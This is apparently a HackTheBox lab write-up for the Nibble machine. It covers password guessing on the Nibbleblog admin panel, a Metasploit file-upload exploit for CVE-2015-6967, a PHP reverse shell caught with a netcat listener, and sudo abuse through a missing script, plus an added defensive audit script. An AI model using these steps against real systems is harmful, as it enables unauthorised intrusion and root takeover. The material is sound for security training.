HackTheBox Write-up Nibble

This is the write-up of the Machine NIBBLE from HackTheBox


Nibble is an easy machine based on a Nibbleblog vulnerability. Using Metasploit we gain the initial shell, and after exploiting SUID we gain root on the machine.

Machine Author: mrb3n
Machine Type: Linux
Machine Level: 3.7/10

machine map


  • Nmap
  • Searchsploit
  • Metasploit

Absorb Skills

  • CVE-2015-6967

Scanning the Network

$ nmap -sC -sV
nmap result

The page source on port 80 gives us a hint about the /nibbleblog directory.


Running Dirbuster on Port 80


Admin.php looks interesting, so let's try to brute-force it with some commonly used passwords.

admin page

Username: admin

Password: nibbles

Setting page

Nibbleblog is on version 4.0.3, so let's find out whether there is any known vulnerability for it.

Exploiting the Server

searchsploit nibbleblog 4.0.3
searchsploit result

Let's use Metasploit to exploit the vulnerability.

msf5 > use exploit/multi/http/nibbleblog_file_upload  
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
targeturi => nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
preparing exploit
exploiting the server


Basic Linux Privilege Escalation

$ find / -perm -u=s -type f 2>/dev/null
$ sudo -l
finding the NOPASSWD file

We can run monitor.sh through sudo without a password.



This file does not exist, however, so it is possible to create a simple bash script in its place to achieve root access.

creating the bash script
own root
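
The sudo rule above is dangerous because it names a script that does not exist, in a place where the low-privileged user can create it. The following audit is an added example, not part of the original write-up: it parses `sudo -l` output, then checks each NOPASSWD target and its nearest existing directory for non-root ownership or group/other write access. The sample output, user name, host and script path are constructed placeholders, and `nopasswd_commands` and `audit_target` are hypothetical helper names.

```python
import os
import re
import stat

# Constructed `sudo -l` output; user, host and script path are placeholders.
SAMPLE_SUDO_L = """\
User webuser may run the following commands on web01:
    (root) NOPASSWD: /home/webuser/scripts/monitor.sh
    (ALL : ALL) /usr/bin/systemctl status nginx
"""

def nopasswd_commands(sudo_l_output):
    """Return the executable path of every NOPASSWD rule in `sudo -l` output."""
    paths = []
    for line in sudo_l_output.splitlines():
        rule = re.match(r"\s*\([^)]*\)\s+(.*)", line)
        if not rule:
            continue
        nopasswd = False  # tags carry over to later commands on the same line
        for cmd in rule.group(1).split(","):
            tags, cmd = re.match(r"\s*((?:[A-Z_]+:\s*)*)(.*)", cmd).groups()
            if "NOPASSWD:" in tags:
                nopasswd = True
            elif "PASSWD:" in tags:
                nopasswd = False
            if nopasswd and cmd.startswith("/"):
                paths.append(cmd.split()[0])
    return paths

def audit_target(path, trusted_uids=(0,)):
    """List (path, reason) pairs showing who besides root controls a sudo target."""
    path = os.path.abspath(path)
    exists = os.path.exists(path)
    findings = [] if exists else [(path, "missing")]
    to_check = [path] if exists else []
    parent = os.path.dirname(path)
    while not os.path.isdir(parent):  # nearest directory that really exists
        parent = os.path.dirname(parent)
    to_check.append(parent)
    for p in to_check:
        st = os.stat(p)
        if st.st_uid not in trusted_uids:
            findings.append((p, "owner not trusted"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((p, "group/other-writable"))
    return findings

if __name__ == "__main__":
    print({t: audit_target(t) for t in nopasswd_commands(SAMPLE_SUDO_L)})
```

An empty list means the target and its directory are controlled only by trusted accounts. Any finding is fixed by moving the script to a root-owned file in a root-owned directory, or by removing the sudo rule.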

Manual exploitation

NibbleBlog 4.0.3: Code Execution

STEP 1:- Find the PHP reverse shell.

I am using a Pentestmonkey reverse shell.


STEP 2:- Upload the PHP shell as an image.


STEP 3:- Setting up the reverse shell.

$ nc -lnvp 4444

STEP 4:- Visit the image URL; it will give back the reverse shell.

reverse shell

inc0gnito – Medium

HackTheBox Write-up Nibble was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
